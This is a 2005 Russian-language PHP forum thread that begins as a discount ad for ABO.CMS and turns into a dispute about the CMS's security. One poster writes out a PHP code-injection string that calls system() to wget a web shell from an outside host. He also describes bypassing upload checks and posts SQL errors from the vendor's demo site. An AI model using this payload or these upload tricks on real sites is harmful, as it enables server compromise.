Cкидки на ABO.CMS для всех членов PHP Club!

[confguru]

Cкидки на ABO.CMS для всех членов PHP Club!

Cкидки на ABO.CMS для всех членов PHP Club!

Компания ARMEX вводит систему скидок для всех разработчиков сообщества PHP Club (http://phpclub.ru).

Теперь каждый участник PHP Club, зарегистрированный на сайте www.phpclub.ru до 1 сентября получает скидку 30% на любую редакцию системы управления сайтом ABO.CMS.

Система управления сайтом ABO.CMS предназначена для создания и экономичного управления широким спектром интернет-проектов. Современные средства размещения информации, позволяют быстро создать навигационную структуру неограниченной степени вложенности, наполнить нужным контентом, а так же оптимизировать и оформить любую информацию, обладая элементарными навыками пользователя офисных приложений.

Сайт системы: http://abocms.ru
Демо-сайт: http://demo.abocms.ru

Срок данной акции ограничен до 31 октября. Спешите.

Для того, чтобы приобрести систему со скидкой - заполните заявку.
http://abocms.ru/buy30/

 

[texrdcom]

Не кажеться издевательстовм ) ?
Ведь нормальнный разработчик сам может и должен писать а не покупать что то на 30 % дешевле )

 

[si]

texrdcom
oc, dbs, ide и т.п тоже ?

 

[itprog]

http://demo.abocms.ru/

взломали ?)

 

[Groove]

мдя...
тема ... раскрыта!

 

[si]

itprog
замена контента в CMS при помощи выданого логина-пароля это взлом ?

 

[itprog]

si
Насколько я помню там нет редактирования HTML шаблона...

 

[Voffka]

"замена контента в CMS при помощи выданого логина-пароля это взлом ? "

там есть дыра в загрузке файлов , во всяком случае была примерно месяц назад , как следствие на сервере теперь хранят зенденую )

а вобще эта система мне нравится , удобная , простая и дизайн легко натянуть хотя в плане доработки оценю на 4 .
/ps - 1 из примеров ооп ради ооп

 

[безграмотный]

Voffka
Дыры там нет, я знаю о чём говорю...
Тезис о использование ООП ради ООП ничем не обоснован.

-~{}~ 03.10.05 10:23:

itprog
Редактирование HTML шаблона WYSIWYG редактором не приводит к опимальному результату, всегда требуется дорабатывать руками.

 

[Voffka]

Автор оригинала: безграмотный
Дыры там нет, я знаю о чём говорю...

уже нет

Тезис о использование ООП ради ООП ничем не обоснован.

class AdminPages extends Pages {

	var $module_name = "pages";
	var $main_title;
	var $default_action = "showlist";
	var $default_page_id = -1;


	function AdminPages($action = "")     { 


switch($action)
{

куча кода
типа 
}

}

вот ооп ради ооп )
я не проиивник и не сторонник ооп , я за рациональное применение возможнотей языка и за результат, как в случае або и получилось - система отличная

 

[безграмотный]

Voffka Здесь представлен класс публичной части, ровно тоже самое было и в классе административной части ABO версии 2.3.

Разработчики начиная с версии 3.0 от подобного подхода постепенно отходят потому обективность Вашего тезиса ооп ради ооп стремиться к нулю...

 

[Voffka]

Здесь представлен класс публичной части

нет даже по названию класса AdminPages , можно сказать что это класс административной части )))))))))))))

Разработчики начиная с версии 3.0 от подобного подхода постепенно отходят
Вашего тезиса ооп ради ооп стремиться к нулю

но ведь пока не ушли окончательно ? значит объективность ещё есть , вот когда уйдут тогда объективность вашего тезиса будет 100% а моего 0 )

-~{}~ 04.10.05 09:29:

а вобще "ооп ради ооп" или "ооп ради чегото ещё" какая разница ?

 

[безграмотный]

Автор оригинала: Voffka
нет даже по названию класса AdminPages , можно сказать что это класс административной части )))))))))))))

Сорри, не заметил, здесь представлен класс административной части ABO.CMS версии 2.3, выпущенной более года назад. В данный момент, как я уже ранее говорил, ничего подобного нет...

а вобще "ооп ради ооп" или "ооп ради чегото ещё" какая разница ?

ООП ради ускорения разработки и поддержания лёгкости развития системы это не тоже самое, что ООП ради ООП

 

[Voffka]

кстаи насчёт дыр и грамотности кода (eval итд ) "случано" ввёл в демке http://demo.abocms.ru/ кавычку )))
результат не заставил себя ждать

Рarse error: parse error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ')' in /home/armex/html/cms-test/mod/****/config.php on line 66

а еслиб туда добрался нуллер ? онбы ввлёл ); system('wget -O webshell.php http://hack.ru/fm.txt'); array(

как и в старых версиях хромает проверка на то что загружают через файл менеджер , указав content-type спокойно заливается php скрипт но тк выполнение php скриптов УЖЕ запрещено в папке с фалами (на плачвном опыте с версией 2 - когда её увели ) то можно залить ssi файл )))

про кличество sql иньекций я молчу тк они в этом случае не нужны

-~{}~ 05.10.05 00:59:

и это после того как их 1 раз ткунли носом в .... (с версией 2.3) всётаки солидная компания ) яб такого програмера ... "отправил на курсы повышения квалификации " )))

-~{}~ 05.10.05 03:08:

и вобще хранение кода в файлах доступных на запись / базе есть очень нехорошо (очень плохо)

 

[безграмотный]

Автор оригинала: Voffka
кстаи насчёт дыр и грамотности кода (eval итд ) "случано" ввёл в демке http://demo.abocms.ru/ кавычку )))
результат не заставил себя ждать

Рarse error: parse error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ')' in /home/armex/html/cms-test/mod/****/config.php on line 66

На демосайте лежит обычная ABO.CMS, без защиты от дурака, не вижу проблемы, если не хотеть испортить config.php он не испортиться...

Eval остался с версии 2.3, моё глубокое убеждение, что его необходимо ликвидировать.

а еслиб туда добрался нуллер ? онбы ввлёл ); system('wget -O webshell.php http://hack.ru/fm.txt'); array(

Не сработает, включён safe mode.

как и в старых версиях хромает проверка на то что загружают через файл менеджер , указав content-type спокойно заливается php скрипт но тк выполнение php скриптов УЖЕ запрещено в папке с фалами (на плачвном опыте с версией 2 - когда её увели ) то можно залить ssi файл )))

Не сработает, ssi отключен.

про кличество sql иньекций я молчу тк они в этом случае не нужны

Пример хоть одной SQL инъекции в студию, пока это только трёп...

-~{}~ 05.10.05 00:59:

и это после того как их 1 раз ткунли носом в .... (с версией 2.3) всётаки солидная компания ) яб такого програмера ... "отправил на курсы повышения квалификации " )))

Батенька, версию 2.3 делал другой программер это факт, говорите по существу, про ABO.CMS 3.x

и вобще хранение кода в файлах доступных на запись / базе есть очень нехорошо (очень плохо)

Это только общие слова, ни одного работающего приёма взлома нет...

 

[BeGe]

безграмотный - Как то php.com.ua привёл пример уязвисомти сайта украинского министерства обороны через SQL инъекцию, если бы мы там изменили хоть один байт данных - нас бы уже посадили со большим красивым судебным процессом на всю украину.
Так что говорить что - если по кавычке есть появлется ошибка - то это можно сказать что есть возможность удалениея всех данных, или DOS через benchmark......

Посмотри... http://php.com.ua/ru/articles/security/sql_injection.htm
грустно становится когда читаешь список сайтов в конце статьи.

А если приводить тебе примеры реальных уязвимостей на рабочем сайте (удаление, отказ в сервисе.....) - тебя просто буду преследовать по закону.

 

[безграмотный]

Автор оригинала: BeGe ...
если по кавычке есть появлется ошибка - то это можно сказать что есть возможность удалениея всех данных, или DOS через benchmark......

Приведённый пример с кавычкой в ABO.CMS никак не соприкасается с БД. Если кто знает хоть одну SQL инъекцию в ABO прошу скинуть мне её в личку.

 

[Voffka]

На демосайте лежит обычная ABO.CMS, без защиты от дурака, не вижу проблемы, если не хотеть испортить config.php он не испортиться...

Eval остался с версии 2.3, моё глубокое убеждение, что его необходимо ликвидировать.

1) в 2.3 не было конфигуратора модулей все настройки хранились в виде массива главном config.php
2) 2безграмотный хватит защищать або и кричать что в ней нет дыр - дыры есть и будут везде , я незнаю какое отношение ты имееш к abo да и меня как и многих это мало волнует , в этой теме я на примере abo показал какие у нас продают комерческие системы .
просьба на флейм не разводить

-~{}~ 05.10.05 16:39:

Database error: Invalid SQL: SELECT * FROM ****** ORDER BY id
MySQL Error: 1064 (You have an error in your SQL syntax near '***' at line 4)

я думаю больше тебе аргументов не надо ..

 

[безграмотный]

Voffka Ярлыки навесил, но никаких доказательств не предоставил, не хорошо грязью поливать...

Ну и откуда эта ошибка с твоего сайта?

 

[Voffka]

http://demo.abocms.ru/admin.php?lang=rus&name=shop

-~{}~ 05.10.05 17:17:

коли хочеш доказательств )

Database error: Invalid SQL: SELECT *, DATE_FORMAT(date,'%d.%m.%Y') as date FROM rus_shop_orders ORDER BY id DESC LIMIT 0,sss
MySQL Error: 1064 (You have an error in your SQL syntax near 'sss' at line 4)
Session halted.

Думаю дельнейшие коментарии с моей стороны излишни.

Ярлыки навесил, но никаких доказательств[/qoute]
Ярлыки я не вешал , я привёл факты(доказательства)